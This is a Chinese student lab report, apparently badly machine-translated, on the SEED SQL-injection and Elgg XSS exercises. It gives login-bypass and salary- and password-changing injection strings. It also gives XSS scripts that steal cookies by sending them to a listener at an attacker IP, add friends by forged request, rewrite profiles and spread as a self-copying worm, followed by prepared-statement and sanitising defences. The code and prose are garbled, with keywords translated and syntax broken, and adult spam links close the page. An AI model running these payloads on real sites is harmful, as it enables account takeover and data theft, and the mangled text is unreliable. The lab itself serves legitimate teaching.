網(wǎng)絡(luò)攻防實踐心得體會(網(wǎng)絡(luò)攻防技術(shù)與實踐課后答案)

發(fā)布時間:2023-11-11
本文主要介紹網(wǎng)絡(luò)攻防實戰(zhàn)經(jīng)驗(網(wǎng)絡(luò)攻防技術(shù)與實踐課后回答),下面一起看看網(wǎng)絡(luò)攻防實戰(zhàn)經(jīng)驗(網(wǎng)絡(luò)攻防技術(shù)與實踐課后回答)相關(guān)資訊。
20212917余2021-2022-2第十周作業(yè)目錄1。實驗要求和過程2。學(xué)習(xí)中的問題及解決方法。學(xué)習(xí)感受和體驗1。實驗需求和流程seed sql注入攻擊和防御實驗我們已經(jīng)創(chuàng)建了一個web應(yīng)用程序,并將其托管在。這個web應(yīng)用程序是一個簡單的員工管理應(yīng)用程序。員工可以通過這個web應(yīng)用程序查看和更新數(shù)據(jù)庫中的個人信息。這個web應(yīng)用程序有兩個主要角色:管理員是一個特權(quán)角色,可以管理每個員工的個人數(shù)據(jù)信息。員工擔(dān)任常規(guī)角色,可以查看或更新他們的個人數(shù)據(jù)。完成以下任務(wù):
首先,熟悉sql語句:我們創(chuàng)建了一個名為users的數(shù)據(jù)庫,其中包含一個名為credit的表。該表存儲每個雇員的個人信息(例如,eid、密碼、工資、ssn等。).在此任務(wù)中,您需要使用數(shù)據(jù)庫來熟悉sql查詢。二、sql注入對select語句的攻擊:上述web應(yīng)用存在一個sql輸入漏洞,任務(wù)是在不知道密碼的情況下登錄web應(yīng)用。第三,sql注入對更新語句的攻擊:sql注入對更新語句的攻擊是通過employee s更新的個人界面。四、sql對策:修復(fù)上述sql注入攻擊漏洞。一、熟悉sql語句(1)要托管網(wǎng)站的apache2服務(wù)器,請先使用指令sudo service apache2 start啟動apache服務(wù)。首先,使用命令mysql -u root -pseedubuntu登錄mysql數(shù)據(jù)庫,-u指定用戶名,-p指定密碼。然后使用指令使用用戶;顯示表格;看看數(shù)據(jù)庫下面的表格。
(2)下面我們使用指令select * from credential打印所有員工的信息,在這里你可以看到員工 散列后的姓名、工資和密碼。
二、對select語句的sql注入攻擊(1)打開網(wǎng)站seedlabsqlinjection.com,其對應(yīng)的文件地址是/var/www/sqlinjection。存在sql注入攻擊的主頁unsafe_home.php。我們可以通過vim unsafe_home.php查看相應(yīng)的源代碼。
(2)分析文件代碼,我們可以看到$ _ get[ ;用戶名和密碼。;]和$_get[這里主要用。密碼和密碼。;]元素,加密的參數(shù)通過散列pwd獲得。接下來,使用$input_uname和$input_uname構(gòu)建sql查詢語句。通過修改 昵稱 ,我們可以實現(xiàn)對sql注入的攻擊。
(3)返回瀏覽器進(jìn)入登錄界面,使用賬號admin無密碼登錄,成功進(jìn)入首頁,證明攻擊成功。
(4)也可以使用linux下的自帶工具curl進(jìn)行sql注入攻擊。具體的命令是卷曲 #密碼=123
(5)看到注射成功,可以返回瀏覽器,用密碼123登錄admin賬號。
三、更新語句的sql注入攻擊(1)看后臺代碼vim/var/www/sql injection/unsafe _ edit _ backend.php找到動態(tài)構(gòu)造的sql語句,這是sql注入攻擊的關(guān)鍵。
(2)輸入 ,工資= 20212917 其中eid = 10000英鎊;在編輯頁面的昵稱字段中;#,在編輯配置文件頁面的昵稱字段中輸入專門構(gòu)造的昵稱字段,然后單擊保存。
(3)修改他人 的工資。只要輸入 ,工資= 1 其中name = 鮑比 在愛麗絲修改的界面昵稱里;#,然后進(jìn)入boby的界面,發(fā)現(xiàn)工資已經(jīng)修改成功。這個原理同上。
(4)假設(shè)密碼以sha1的形式存儲在數(shù)據(jù)庫中,您需要首先獲得指定密碼的sha1值。使用echo-n ;123456。;|sha1sum將密碼123456的sha1值輸出為7 c4 a8 d 09 ca 3762 af 61e 59520943 dc 26494 f 8941 b。
(5)接下來,繼續(xù)用alice 的帳戶,在編輯個人資料中修改用戶名,并填寫 ,密碼= 7 c4 a8 d 09 ca 3762 af 61e 59520943 dc 26494 f 8941 b ;其中name = 愛麗絲 ;#修改sha1值。此時,您可以登錄alice 的帳戶,密碼為123456,您可以正常登錄。攻擊成功了。
四。sql對策(sql注入漏洞的本質(zhì)原因是執(zhí)行語言。句子和數(shù)據(jù)放在一起,使用預(yù)處理句子機制可以很好的防止這種攻擊。在unsafe_home.php中,我們使用預(yù)處理代碼,用之前的登錄,發(fā)現(xiàn)賬號不存在。同樣,我們現(xiàn)在可以防止sql注入攻擊select語句。
$ sql = $ conn-prepare(從憑證中選擇id、姓名、eid、工資、出生、社會保障號、號碼、地址、電子郵件、昵稱、密碼,其中name=?而密碼=? );$ sql-bind _ param( ss ,$input_uname,$ hashed _ pwd);$ sql-execute;$sql-bind_result($id,$name,$eid,$salary,$birth,$ssn,$ phonenumber,$address,$email,$nickname,$ pwd);$ sql-fetch;$ sql-close;(2)更新unsafe_edit_backend.php中的語句代碼,修改代碼,然后通過edit profile修改薪資。發(fā)現(xiàn)剛才的語句顯示為昵稱,于是update語句的反sql注入也就完成了。(記得還原環(huán)境。!!)
if($input_pwd!= ){ //如果密碼字段不為空。$ hashed _ pwd = sha1($ input _ pwd);//更新存儲在會話中的密碼。$ _ session[ ;殘疾人和殘疾人協(xié)會。;]= $ hashed _ pwd;$ sql = $ conn-prepare(更新憑據(jù)集昵稱=?,郵箱=?,地址=?,密碼=?,phonenumber=?其中id = $ id );$ sql-bind _ param( sssss 、$input_nickname、$input_email、$input_address、$hashed_pwd、$ input _ phone number);$ sql-執(zhí)行;$ sql-close;}else{ //如果passowrd字段為空。$ sql = $ conn-prepare(更新憑據(jù)集昵稱=?,郵箱=?,地址=?,phonenumber=?其中id = $ id );$ sql-bind _ param( ssss 、$input_nickname、$input_email、$input_address、$ input _ phone number);$ sql-execute;$ sql-close;}2.2 seed xss跨站腳本攻擊實驗(elgg)為了演示攻擊者利用xss漏洞可以做什么,我們在預(yù)先構(gòu)建的ubuntu vm鏡像中設(shè)置了一個名為elgg的web應(yīng)用。在這個實驗中,學(xué)生需要利用這個漏洞對修改后的elgg發(fā)動xss攻擊。攻擊的最終目標(biāo)是在用戶中傳播xss蠕蟲,這樣無論誰查看被感染的用戶 的個人數(shù)據(jù),它會被感染。
1.發(fā)布惡意消息,顯示報警窗口:在你的elgg個人資料中嵌入javascript程序,這樣當(dāng)另一個用戶查看你的個人資料時,就會執(zhí)行javascript程序,并顯示報警窗口。第二,彈出窗口顯示cookie信息:顯示cookie信息。第三,偷受害人 s cookies:給攻擊者發(fā)送cookies。四、成為受害者好友:使用js程序添加受害者為好友,無需受害者介入,使用相關(guān)工具了解elgg添加好友的過程。第五,修改被害人 使用js程序,當(dāng)受害者訪問alice 頁面中,信息在沒有干預(yù)的情況下被修改。第六,寫xss蠕蟲。七、反對xss的攻擊。1.發(fā)布惡意消息并顯示報警窗口(1)在firefox中登錄網(wǎng)站,用alice 的賬戶。賬號:愛麗絲,密碼:seedalice。登錄后,點擊頭像,選擇編輯個人資料。
(2)輸入腳本警告( xss )在簡述中;/script,單擊保存,將出現(xiàn)xxs警告。主要原因是字段直接插入數(shù)據(jù)表,沒有經(jīng)過安全檢查和過濾。在顯示內(nèi)容時,也是不經(jīng)過輸出凈化直接讀取顯示。
二、彈出窗口顯示cookie信息(1)在個人主頁的簡要描述中輸入預(yù)先設(shè)計好的攻擊代碼scr。ipt alert(document . cookie);/腳本。點擊保存后,出現(xiàn)下圖所示的cookie,cookie信息顯示成功。
第三,偷受害人 s cookies(1)使用ifconfig查看你的ip地址。
(2)輸入攻擊代碼script document . write( ;img src = 192 . 168 . 43 . 46 : 5555?c = escape(document . cookie) ; );/script,然后單擊保存。
(3)切換bobby s帳戶,在終端輸入nc -l 5555 -v端口,使用bobby訪問成員中的alice以獲得bobby 的餅干。
第四,成為受害者的朋友(1)使用boby帳戶訪問alic friend = 44 _ _ elgg _ ts = 1652915920amp_ _ elgg _ token = x8w 2 vfgmj 2 vcqgomkruylg
(3)根據(jù)上一步中的參數(shù)friend,參數(shù)__elgg_ts代表時間戳,參數(shù)__elgg_token代表令牌,構(gòu)造攻擊代碼。
腳本類型= 文本/javascript window . onload = function{ var ajax = null;var ts=amp_ _ elgg _ ts = elgg . security . token . _ _ elgg _ ts;var token = _ _ elgg _ token = elgg . security . tok 44 ts令牌;//創(chuàng)建并發(fā)送ajax請求來添加friendajax = new xmlhttprequest;ajax . open( 獲取 ,sendurl,true);setrequestheader( 主持人 , www . xsslabelgg . com );setrequestheader( 內(nèi)容類型 , 應(yīng)用程序/x-www-form-urlencoded );ajax . send;} /script(4)把這個程序放到alice s about me(注意這里是編輯html模式)并在alice 關(guān)于我的界面。
(5)接下來,利用博比去拜訪愛麗絲 的主頁,bobby會自動加alice為好友。
動詞 (verb的縮寫)修改受害者信息(1)用http header live看看修改信息的時候怎么做。這樣就構(gòu)造了一個類似上面的javascript程序。
腳本類型= 文本/javascript window . onload = function{//訪問用戶名、用戶guid、時間戳_ _ elgg _ ts//和安全令牌_ _ elgg _ token var username = elgg . session . user . name的javascript代碼;var guid = guid = elgg . session . user . guid;var ts=amp_ _ elgg _ ts = elgg . security . token . _ _ elgg _ ts;var token = _ _ elgg _ token = elgg . security . token . _ _ elgg _ token;var內(nèi)容=令牌ts ampname = 用戶名和密碼這已經(jīng)被愛麗絲破解了。/p access level[description]= 2 brief description = access level[brief description]= 2 location = access level[location]= 2 interests = access level[interests]= 2 skills = access level[skills]= 2 contact mail = access level[contact email]= 2 phone = access level[phone]= 2 mobile = access level[mobile]= 2 website = access level[website]= 2 witter = accvar samyguid = 44if(elgg.session.user.guid!= samyguid){//創(chuàng)建并發(fā)送ajax請求以修改配置文件var ajax = nullajax = new xmlhttprequest;ajax . open( 郵政和郵政,sendurl,true);setrequestheader( 主持人 , www . xsslabelgg . com );setrequestheader( 內(nèi)容類型 , 應(yīng)用程序/x-www-form-urlencoded );ajax.send(內(nèi)容);}}/script(2)把上面的代碼放到alice 是關(guān)于我的,然后利用鮑比去拜訪愛麗絲 的主頁,這樣鮑比 的配置文件可以成功修改。
六、編寫xss蠕蟲(1)目的是這段代碼可以復(fù)制給其他用戶,那么蠕蟲目標(biāo)就完成了,所以使用dom查看和使用html代碼,innerhtml方法就是開始和結(jié)束標(biāo)記之間的html。把下面的程序放到愛麗絲 是關(guān)于我的。
腳本id = 蠕蟲 type = 文本/javascript var headertag = 腳本id = \ 蠕蟲\ type = \ 文本/javascript \ var jscode = document . getelementbyid( 蠕蟲 ).innerhtmlvar tailtag = / 劇本 var worm code = encodeuricomponent(header tag jscode tailtag);警報(jscode);/script(2)訪問alice s profile通過boby發(fā)現(xiàn)這段代碼已經(jīng)復(fù)制成功,說明目標(biāo)已經(jīng)達(dá)到,利用dom api已經(jīng)成功復(fù)制了蠕蟲。
七。對抗xss攻擊(1)elgg本身提供了對抗xss攻擊的插件。用admin/seedelgg登錄,找到account-administration-plugins,找到插件htmlawed。這個插件的主要功能是檢查用戶 的輸入和輸出,并刪除特定的標(biāo)簽。
(2)檢查愛麗絲 的個人資料,看看它是否有效。可以看到,xss攻擊此時沒有效果,alice中的代碼顯示為about me。
2.學(xué)習(xí)中遇到的問題及解決方法1:在1:sql注入中,檢查用戶表中沒有任何內(nèi)容。
答:顯示表格;;在這個命令中;脫下來,注意很多;的存在!!
問題2:在增加受害者 的朋友,點擊愛麗絲 的主頁沒有成功添加好友。
回答:上一步的注入代碼沒有刪除,刪除就好。
3.學(xué)習(xí)感受和經(jīng)驗是一種以接觸網(wǎng)為方向的攻防練習(xí)。希望在以后的學(xué)習(xí)中能進(jìn)一步提高自己的能力。標(biāo)簽:
語句碼
了解更多網(wǎng)絡(luò)攻防實戰(zhàn)經(jīng)驗(網(wǎng)絡(luò)攻防技術(shù)與實踐課后回答)相關(guān)內(nèi)容請關(guān)注本站點。
上一個:廣東萬年青的形態(tài)特征及觀賞特點
下一個:柔性電纜的安裝注意事項

原裝意大利eltra絕對值編碼器(精準(zhǔn)測量工控設(shè)備轉(zhuǎn)速)
金華佛手的栽培管理
大屏幕輕薄本(大屏輕薄筆記本推薦)
imperxcmos 相機ip67
閱讀招標(biāo)公告時這些事項必需特別注意
在哪里買電腦便宜又正版好,去那買電腦便宜好
ios怎么玩電腦(ios連電腦用什么軟件)
各類硬盤的區(qū)別是什么,計算機硬盤和內(nèi)存的區(qū)別是什么
你會如何區(qū)分金屬膜電阻和碳膜電阻?
意大利ultra pompe泵
十八禁 网站在线观看免费视频_2020av天堂网_一 级 黄 色 片免费网站_绝顶高潮合集Videos